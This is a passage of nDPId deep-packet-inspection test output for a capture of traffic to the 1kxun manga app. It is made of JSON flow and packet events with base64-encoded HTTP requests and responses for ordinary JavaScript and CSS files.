(KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140836,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":436,"midstream":1,"thread_ts_msec":1654385140836,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140850,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":414,"midstream":1,"thread_ts_msec":1654385140850,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01022{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1654385140850,"pkt":"tKXvZygQnLbQ0+MzCABFAAHSWjRAAEAGbTnAqAJ+oXUNHbFwAFDyLD7Q6DFyGoAYAfZzfQAAAQEICrrGFpuXERgHR0VUIC9qcy93ZWJzZGsuanMgSFRUUC8xLjENCkhvc3Q6IHRjYWQud2Vkb2xvb2suY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6ICovKg0KWC1SZXF1ZXN0ZWQtV2l0aDogY29tLnNjZW5ld2F5Lmthbmthbg0KUmVmZXJlcjogaHR0cDovL21hbmdhd2ViLjFreHVuLm1vYmkvDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCg0K"} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140850,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":414,"midstream":1,"thread_ts_msec":1654385140850,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"tcad.wedolook.com","url":"tcad.wedolook.com\/js\/websdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140850,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":414,"midstream":1,"thread_ts_msec":1654385140850,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"tcad.wedolook.com","url":"tcad.wedolook.com\/js\/websdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 02226{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1654385140963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1363,"pkt_l4_len":1329,"thread_ts_msec":1654385140963,"pkt":"nLbQ0+MztKXvZygQCABFAAVFItxAADQGrR6hdQ0dwKgCfgBQsUzC7TqsQ\/Mw2YAYAOvLegAAAQEICpcRGHq6xhZUSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9jc3MNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBGcmksIDE2IE9jdCAyMDIwIDA3OjExOjEwIEdNVA0KRVRhZzogVy8iNWY4OTQ3OGUtYzJlIg0KRXhwaXJlczogRnJpLCAwMiBTZXAgMjAyMiAyMzoyNTo0MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9Nzc3NjAwMA0KQ29udGVudC1FbmNvZGluZzogZ3ppcA0KDQozYmYNCh+LCAAAAAAAAAO1Vm1v2zYQ\/mz9ivvSpTMkS0kLrFCQAe1eiqApECzFin1kJMoiIpMCSUW2i\/z33VEvlj1JGZbOH+KYvHv48Lnj3YVLD5ZwV4uSa7hY\/bSK6PdndS8KDlZVSQ6mECluMplCptmG10o\/QC1sDjnTac00B5YkvOCaWZ6C1UwaYYWSBqEILbe2jMOwruuVSJlcc61WlQkbXPx2h4et8S+q3Gmxzi1cROdRgH\/e+vBnwVKxERo+4ZEF25QiFYT8Jecgfu0hZw5r0W9EwqVBlpWkO328vYEf4PP1l3b7D7wFo20lY3hfrStj4U3kE5W33jL0wiVcvezjfWBGJJ3gd3ZXcAPeyzCvrpDaqpExSJS0TEi83DdvsWF6LWQcAausuvQWpWoiE2teMCseOa6pR66zQtVxLtKUS1wJan7\/IGxwz5KHjCU8eBRGYEIIuxsYbdT+OQvzjIGa3589H0Pxu9iCyuCrYwtZIZIHroVcA8qx2AcCQ7yNzy+9p16cWrOSEh2lGZOiFqnN4\/MoejVQ4ZDPQakVeqMKnUJuL1N640PBM+vjiynHXdMKXwe+iTgypwbkHzskjAl\/k76Oyq0f+dGPp4buUQUWH4JcB1klEwdICYuWGDaKyCjbfmOEar\/XoJ\/w7HdnSfZWzzFU4\/za5RF2Rw4n3AZek\/Id+U8oF4wCNVEotxQF0taMU+\/WR7h3W+PCtnjzuh4dOkHfW4zFfCIzB6bHavb2U1IOPMeJDOqG2gZG7DFLY6ByxCXWErWldKZMwX8ntid3Di8405wjSsrhZ+hK3uBVHz3M8WwEejCBqmzHZ+Zmx7az0TgynU27oeW\/PLut49AV8oMerolSPcMSzmzsyhBdrCvhk1r\/91BQF7z+7TyCr1hhVW3gNleSwzuqx9jMBr2oLt8FudJiTz2pIJbuHdFUEbCmekHJZLA7qtHohC3JimTOBbPpyfse\/fgvVWlIsNGrDRjXjn3IOc40O1WB5DTQKDAlT0S2c9nsmuuZcfOQU\/\/MeJjt3Ph4F+y2rsz7wG2y+t\/6OkbgrqXUjG7I5w45xKS+twiXTSe7iLCVYDbknAaqGLCz4W80GcmfISQNfGYIiRWwwyQQao8DzFcjkC6+j5xi3iPj3ENRx9Uma0luVySoX59yaoYOHEJPENwsgsv\/gFh4CIFnvXCW8m77IEIznn3PKB4yJMB5zeJ03V6PpNjzQQbBfWUtjaHL0N2sK3aNgifeLhcO8jauTTo3AEN5WwUnIDp9RzH+Bl7SBF8uDAAADQowDQoNCg=="} 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1654385140978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385140978,"pkt":"nLbQ0+MztKXvZygQCABFAAXUMwZAADQGnGWhdQ0dwKgCfgBQsVapSiuNYxvrg4AQAOsJXgAAAQEICpcRGIq6xhZjSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vamF2YXNjcmlwdA0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkxhc3QtTW9kaWZpZWQ6IEZyaSwgMTYgT2N0IDIwMjAgMDc6MTE6MTAgR01UDQpFVGFnOiBXLyI1Zjg5NDc4ZS0yM2UzNyINCkV4cGlyZXM6IEZyaSwgMDIgU2VwIDIwMjIgMjM6MjU6NDAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTc3NzYwMDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCg0KNjAwYQ0KH4sIAAAAAAAAA9y9aXcjx7Gu+33\/ChLWpoBGkU22JJ9tsItYUqtlydZkdduSNwh5YSgMJAiQANiDCPq3n+eNHCoLBCV7n3PXvetqIGrIyjEy5oj8j6dP9vcu\/nJbLN\/vvTk5OuG\/vc1efdDYe3Z8\/EnG35OPw\/svFrfzYW89Xcyzva\/mgyMKXtzoy6PFcvx0Nh0U81Wx9+Tpf+yPbucDlav3sn7jrrboXxSDdS3P1++vi8Vo72oxvJ0VBwePvDgq3l0vlutV25ULt3nvaLgY3F4V83W7T837x41W2VDjbjqq75dFGuvJcvF2b1683Xu5XC6W9Zof5bK4uZ0ui9Veb+\/tdD6kzNvpesJdqLzWOF0W69vlfI9WGvct+1uvMfZiNJ0Xw9p+GIf7vu1+WuvJdJWVHdLI3\/SWe4O8082G+eBopRnKCq4Gi\/mgt85GXF7fribZmAu6Urz7bpRN8rv7bJpPjtaLV+vldD7OLriZ9FbfvZ1\/v1xcF8v1++xShWZ5zS1YLbvKq+36\/mvwV0ejOZVP17YW99k8f\/pz53x1fvvFyy++OH\/36XG3udm6\/+DpOFtQ7PBqdfg0u86fHtY758Pe4S\/dxtPxNLvZ3VifHv\/1mv696K2KeuP+VC3nV0fXy8V6oYXP7xy0tGYZE7BaL28H68WydZWtihngwWWtls2K+Xg9aR1n68Wny2XvfbnCjTs\/quHRoDeb1TXdjftsXKzLMr1YaH47m+3nvfbxWa+tkp1eUz9Hrv6uLVan121VK9NqvFr3BpeVKrWKfUZyVSzHhbWrFQwDqDeyXgkxDLd4853Be24A0VfZdfFubbfhJuvfZ0VvMEnaEbz4EV4d6Z21lGkH3WdXveukaCxoQ4qdrtPF3rX7LMJDPxvE4j03czxSpQ3qNZgsa44ltyoeHvWur2fvfY+WY9uEK1Uwmi5XyQJUKyhu6seUmfV+tcjhCWWKm7IXrKKb8mTFskHe7DXrWs5+6zjO91Y\/B2f58cFB\/2zQ7uhNZ9DttjpdVT8flvVXO1ku2GZj1aVrKzDic01xa5StwEotNjI\/2epa21l3dsESgafWtAOgsOP8dVwGNyQWk7kfZkU2YtP3wkR2jrubDTt6kp+w9eNjD6wggP2T05FQWH+xmBW9eYlJxwcH9Yt8XKls4itrNhvZAww73myujqarLwKCHjc2m\/oYdNKg9TyfUt\/YAe7k8LBxOj2bnE6oCNzqdlS9KPvXmXQbDfVruDed7xWNXj7uDLusVKGf8X6eD9S9gwP9qNXvZ73p3G0OKAwNa1dNV7bRedBotOt9\/mO44MbewUH5stdo97SSrfg8rcveMn9qnhrd3NcvmGQqbb1ZTId7x743VoSnAcWPy4Wr30F3elCElicVtWZ91vymt54cLfX4qt5oHC2L61lvUNSfnn8OlqzVGtl09UPRG75v7R9nhQhNCWfA8TYRgp5k"} 02437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1654385140978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385140978,"pkt":"nLbQ0+MztKXvZygQCABFAAXUMwdAADQGnGShdQ0dwKgCfgBQsVapSjEtYxvrg4AQAOu7rQAAAQEICpcRGIq6xhZj88Ui2cwNofu4HpWPHTaoBRhi1RmcMKnIEh85BGl\/wyxuNqE0ZTw6qfWESB98\/aMRvx0N7nnceXDQy6G5jrqpvW\/Z9svpYMcn++lK8d3hdW+5Kr6YLXqQnQabUp+\/vLpev3erX6nC9rrBd19w1Gu4cQPz\/sK+TtZ7x9dG+zebAO4sdpypzaZ3NF8Mi9dMnAN+N3I6Vra0Xr4X\/wCCLBH7wcH+hUOYvayWPK81kjfpByWpy2oAe6B7341qZUv3EH5Qe8TJ+yf3tHt5tHg7\/xo0adupMg17sQ\/9RjpJAYAddAMa\/c0mKXqfCVAqM+WJi1aXdW33mrVaK0xYZM16TGIAoRLN9NqTztTPRQP0Ej5rqREYuh57b7bo92Yv3\/RmZaNQtL52MXzMVb3PtDHBxbti8GqwnF6vE1ilIG\/4Nsy3yBNf3GeD3lUxE0dR1hoBe68Xt+Miq8Gs1Mr9eZ3d2FYbFt9SQ\/JxQmYdXOg9IGswomvYmK8XbwMbo4mtPtlBuEViBcUg9vxYqCtg7nG+BMxOWWFK8HfcuBO+PB2dFaeFQ6tD6nfEtdcpQJ4NeMUcDNjoL4ve5X0xg6XWN4XbG1Tyr3zxeFvGO1lTRaaff629X\/8qwCJgoKVOZjvgIMMpgjpgri7IK1dqLiwqDueycAgtgJ8THjSvAwF3pxuaifipvqx7asJebgcGbZDV4M3gnFP4Fa\/Xg3w4ABvAsjWyAVhp\/rDNuJpaNyDT5tJvnrH7vg9bNnDbUavhmEoI3wB+c9A2knHVe1c\/zobNQaM1aB2fDs8GpwO34gOtJPuiD3vCUgd8tze4d40cnjAbYjWTeRTUuploxuaGwBrU2Ld++nYynRX1wdmwwbI2m9283xnyY8An4tdwBSI15HV3q6gfZKgyB0LY2JC8Sk80P4LIAPGINyO6Aj8TJmKS7w9Ox2ej0xEjHub7SFCdEaWANXoyOTgoTO6xp5ESF4KBhy25Vh40oH0FrwRQsDwTQ5tJi6FBbScHLcODg6lrdNg4jZtq5DYVa+h7+MgHfmIKv1MZ8RSQHd9Oh62TDAHnXSKnmMhrayU2z8PsA4hk\/esgik6\/m\/XzXtbLmRwR0S8CYwZPUx\/kXjyJLGH2rMGaxx0St1fP94x9Ih42CzJmfbsCmCwQ2JG6znolPyKNum02syLwTOJV3pZrH1prSq78vLdmxVa31xLVW5fwj15qqX3mmNQ92IV+sdxzUuxeGNiebTj7fO+HYvzy3fWe28NOTK8ZP72u1\/ZgreI4bU4nnVpnYZLVXq3Zb9a6NWB8CzezJ\/0E7glCvBwRAXNQsgVhYUJ58UeDLf6gvX\/SOtEWjQwEu7a9f9wqWSo+OaYE816b23hLpKMtfiZx5PDEwOxeQLEqFy90r5QIskk2zS6yy2yWXWXzbJFBxbJltsrW2W1eW01\/+WVW1JqHYfqzN\/QsaC2yt+zBd\/z\/Ph\/3kUl\/cT+fup\/PkmZTCqiuA4mzHGVKBp\/1Ik\/0HNnn+cnz5x+dZC+RD7ZVEF9IrfHH\/Iuj68V19qV+pcn4Klz8iQun8PgzV165kVB8Bh9wSJ9OD5x07BDp6eCsf9p3yNLEuH5Xi+C5tb2+Xzrhya\/z2mBSDC6L4cZpEbjord7PB5ve7XoxQl20siuY9vcbCeLLxWy1QZFTLDfD6arXn\/HBZDocFvPNdAX+2czgzjdXt7P19HpWbNC3zDcQ4uFiPnvPhamOaGvAi2Et+yavdc7P3z07Pj9fn58vz8\/n5+ejbi37Nq\/V261z\/jlCuXL+9rC76fxMwePjQ\/72jruNZi37Lv828i+1t7Ws9vZ3wPz3ee38vFNrftOsPanXmt82aw2q8vedJz9\/sNn\/Z7edN\/yTduvDetkUbZyff9htPGl8uDmvbb84r+nNeW1Dvd9Rb2Pjazk\/p89\/ySHNscHz"} 01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1654385141007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":758,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":758,"pkt_l4_len":724,"thread_ts_msec":1654385141007,"pkt":"nLbQ0+MztKXvZygQCABFAALoSV1AADQGiPqhdQ0dwKgCfgBQsWZt3FH46sMh84AYAOt5XAAAAQEICpcRGKa6xhaBSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vamF2YXNjcmlwdA0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkxhc3QtTW9kaWZpZWQ6IEZyaSwgMTYgT2N0IDIwMjAgMDc6MTE6MTAgR01UDQpFVGFnOiBXLyI1Zjg5NDc4ZS0xZDkiDQpFeHBpcmVzOiBGcmksIDAyIFNlcCAyMDIyIDIzOjI1OjQwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT03Nzc2MDAwDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQoNCjE1NA0KH4sIAAAAAAAAA02Qy2rDMBBF9\/kKkY1lcOW8W2K6iCGFbEKhTTelFEUau3ISyUiy0xDy7x2l7mMj5nnuXB2VlubIiu3CnbRYaeXJPSkaLbwymsbk3CPkIWcKGzTEhPC6XskQEDIn0Ww4uRveDqbT2WQ2GI+i5DojjNkp6Ga8beC7\/FlsD\/trFVf\/yi1Yh2qhgcR2zEYRUi5xhi9qL+p62YL2ju1N+chLeFFwpNi9ZL0e\/b1VJsQlRMn4jGstt6TCtKgc+pGsBL\/cwyFQ8tMzL9f8ANTFr4O3IKIKQv\/P5KeVpEhC+xZ8Y3V2wakOJSxwDx0NGRk2mJIoo2SAYeaswLT\/4X3t5mkqjNYgPCu4gC3+DNPgU9Dvm6fUyR2rXD\/s4ams5hZPXBsJ+OMOrM+hMBZoZyV4ptKIJhhJSOSEVbWPMPpB31QOkVEcZ1+K5mSs2QEAAA0KMA0KDQo="} 02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1652,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1654385141021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385141021,"pkt":"nLbQ0+MztKXvZygQCABFAAXUlr5AADQGOK2hdQ0dwKgCfgBQsW6vfZ7o+FUx6IAQAOt7dgAAAQEICpcRGLO6xhaNHCwI16MrW77BnSuFmzoykUoRY8lU4Y9BxcNRoFb0Nbq9knEDoYSbOgMHRrfnqOX3O+WBrjxffQX3ReCDHd0huHxstQ1Cl\/qCI3JJYcSFoSljElAiEYABMWaZUpwIs4TWVvNRU0E04f1s4mMZAPH8ZJv5kyEw4gxQnp7DyGbCSAzEhQ5WUtEp01gvCvJqkcZxoD1kB06PnkkrzDYXJQ1MGeJC6VFSWBTzBI5Z\/t3F+8naQaVSej\/ZftVcv7yv6uvTr8ukGGw01mXvTeuoCfsSOEbkIIlD7bAu9Acq\/qe\/\/9tf\/vWf\/uMv\/\/DzX\/zjf\/7d73\/563\/\/+ff\/hj0vun\/547\/86W\/+Yb77GfUjZ9IbTlBLryo\/\/9U\/\/\/KHPyo4YDi9BWaPWNxINPA8fGxGZ7Ly\/JDCsRwhxAvaM\/YA7tqsMUg+6kiqQORpMzNKot+7rlaqj0ywsK5nZSWXoBx4yLtHs0A1l1MExo6hxy1Y+6cwLT5PmWU5lzTJcMbDYoWUtJEK6o\/8CNXxauRGQ0cX327o3cirwlH6GNFTjT\/FQUFu+D02rEOW1fzNC6TxCmRspFbl5W+KvIPl9kxlJpEnpfhE0oul+9LkWYknx7owSteNNIW2KSX+thqUDaQMFsv9FVgu6+WLMsh50uyUzosn30zQrKOV8NJfnjorMfQlpB3jBuovbdAQKf0mZf4E8bdX8MnmJCHlCzeBIc75UTYvkwSkhvkc4Gx6j9Cz1SsqnHNlRu6WbaMag6X\/qkQxl+sgsO4aEiWUuZyfTPDf9aPIHyEhCyCaT+jJ7IwzKtAh5VEKYv37uP9EdZIkYgSU3iX5Ct6pHjTN9AbOECnmGwjuRTi2vATBTJqVpULrVSR8UYLi2oWvnC36N4eLRPWsLkAnKG1hCyovNCdpm+gQNK3Ss7werCGrELRCooVpRJUaSEDJtiERERNCK+O1yZFU9f+tpLipmZNUos7xA31tQvlpFJ7hJogMtSrZG\/7BjdRA2gc7bLCquzRTwmvpJTiAcI8TcaZcJLU8JLE1pEHp8d6mkiSV0txWpNM3dogujMbcYlr6h5BVLCXtO1Rvtk8jkiaWc63H7cyFxW0g9Vk9vcfOCtUzvSJcXVET+wKt4ryhsc0Am1stFnslTwBoBq8eRFlr0eP37hgejifz5D9GKMJ1rm3rjoqoT+Ft4tMGXWn74uFs4oB+anrn2Chr489nV6hJ44+vApc\/nOLjzoAeedFxBMzYq65n3lfrCr670Wt1BV836qt1JcCfWtwqmmuifZW3p+QhhBBdEXGg4VvLm1j4YlBXXjndQDy2qUYbTc1xgFJ10M7I\/RZFeDRiMiTw5mQwIRqUUwcxACoLw\/NxL\/L50xFy4KJxH1+PsUfORt+8t+VqKiE\/uqz1jQ+qpte0qb6fA9E3hqoW+50VHY6n\/iEHjGsHFRkzlQDUMAeKhBkv00XfuFW1y6l+lAPI+orVqX6a05ksCVCA9Mud2Ya6El0pU\/02Z6xMJ6o3p\/qneSCUo5Gql2JFFu\/E3CukH39EHhffpinlahk7VCtvbaw56y9fVqb6OxkXqSWSH8YnCLdrrm6sFfvGoaqVLKawnl3TUViuPmkOLlaQ+\/CwqZWq5B93X5g1hLtn2OH96Cp1ky1V5RsGYyw2xrNfmmuIcr40N0oegoSgJClDlPClnJaqxGutvApuxcWHFS+qyjtFb6Mk02DlQioQEaG8xLJM+XGRexW6Vi0C5IW5uqNaRUxc3qyrVkndJCLwopEEp1P9lSxDMZLWl28frDhK\/KA0oxwwrszoZ8rczoHoG69mlRmlWWnYQ8yXShX2I7rCYkMTIxmQFtejdYApy4HGTQw1qQJbbYuvfLIO3kp1ZcV7sfXw8EzFM64z3svNBHxVLJgYvcqkcjg7OSIBxo8IE3CoZ+rdyiqlP+6e"} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1654385141022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1421,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1421,"pkt_l4_len":1387,"thread_ts_msec":1654385141022,"pkt":"nLbQ0+MztKXvZygQCABFAAV\/lr9AADQGOQGhdQ0dwKgCfgBQsW6vfaSI+FUx6IAYAOsf5wAAAQEICpcRGLO6xhaNww8lvHfP1yoVTdup1qGXP8qj53hMV3qq381D5uoEs94his4dlQyHNT+skIrlDVX+IlpUre4o45FSV6wRdmczZ0zfQN7NiPxzHJAiez3Vd2VAErzf75sSVaRwn3zPOe73EdfAYm1UtG82+Ne90ZVzily1Z4fSMgl6WCVtMSWz7XpwrkAoBkvNYjzwYl62d7soAjSZ4sMrxBcn6SSwBcYaCxsRzEvaA\/RQMvHEdi1eXlRYWzFuE+XGBBcfiKZZZTCofqooReqhwbmAtRhQwInVpTFTfSBLbm7dhRieV2sPD9XaVH\/9FOipfpUDxnceaqbZznuzACIVtZiaQbtLoZOFYfDhUvhkxRj8sQzPfAWTyGXrB4\/6EUUqb6DQGrsIASeSf0r+rMbh2weUfZaUYsQ\/bsBLkV6EyLESJ7NEHGP\/Hif7t3Asn7BFbJFi0rLKuOjJCAReZgGKNG\/fGNGJxJ5wHy8qZ9RGhotQ9Q03eYJ64\/2ETr7zHJSSOc+yq2rMosPdiidnbmIad7t4\/\/5yR72wSp+apT+\/1BCES+xqpPO6\/+iZiQeMN0NmC+lr8f5FiE+vqI2eQFYcdQGMmAl\/ZC+V51WanjW8w90f\/Nyn7rGrh7qvD\/RAt\/QRXM0L5TXLwiTQx90P+PUF5dIMGu5FcGnS\/x4eEkqBi1qMn1iH8RM+B7nU+Kdg+JSVfS0RQnIMZmhWv4lP74ZlhkYvUxzsa\/oIjTgQRblwuHt3Zg2OEAFTfe2ictmwDCu883r4NQDLCIOeSXW7KGpCrcER0q8IT6HuKNp14I\/jAwywg7AwD6rrcemjrtCvKYzJHyyXb29vRc6pZMXCYRmf9O0DfSg4oCqLgYXPghi9aDlvljZWK9XN7fXVUnUDDVRnK4DoKwC0jPE5EkvKSNcF3Mx3+W9sqOK3NvhVAUW74t1cFt0Rv9nBLSbHFX+LlhkaF+xIgSExVBdTFVk5GMrr1HR6+B\/p5QYJ7f8F1OZRWYqll6X2iP0gifg8\/EhFyTo7+4a2t1Ss2Z84YdL1nirX7FgUm6DKTojV00qeLFLodixSTpxgZCl9jyy72PPJtIlsYrtAH9bCJYq3LGr5bJa5FL9WoN5SHSDf5jplRLR7+rgEiYOlVGV+4kVYfD5SFI2S\/HExsMx7VtJB2Omkvqc2Q6QLTH57xbdDUiO3IBJl3MyR\/eNI4Cwy+BsqRM6iYE1LEawKBCLPmkUhGpciWRNIQqr+z8Uk9+Sg48Y7EZNUpinWgEk1kZtgH7W+srAQhE5yRQhEZ7o+Q7gz3wLLaGa\/Bpb78CVwvJTI8ZumtGhSe5YsIxwzT9jVq\/EnwFMZpzHxwiu3H8m6iX1EGp1RgRl5cGXIkcZnakmeJLhWzXwVzWhmPZ8lBY5rkQx471MkAB2ekUCsgzkyiLsyGvG4oufJIR6RJwnR91myiPEtkkbc\/xR5YDvOyEPefnnbJNOfkYzck7NxmXHNfjzPlCEzLE9GMsBnCUoeuHD\/ZIDyRTZd5idkrDqvHMdhgJSC27+jjz4teAnJYdLvtvDVAVxKUb3Q7zbJRaPGNIqp3b\/ahXcGuHsEclt2Xalt1VYra9Xa1tZ2pbIBD+pjvzsa1imLqIvavrpyUzO2FcRoMbg5HrMfnArpy1P6panvkYiC79tIPVkbniyVcJEx\/RDq\/Q+haec7kyFzJqEpcv\/uHfJyGB9HFaZsfNZDDbXGh9CAkXNteiAXFG4kLsseXGSjj2w6K93xnKiMX5I7Py2H9jW+AFUaIGaho8ppJV81x0mNcZY+hMCFUoc\/+y\/qLnGNmk8AAA0KMA0KDQo="} -00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385140836,"flow_last_seen":1654385141022,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3231,"flow_avg_l4_payload_len":1077,"midstream":1,"thread_ts_msec":1654385141022,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; 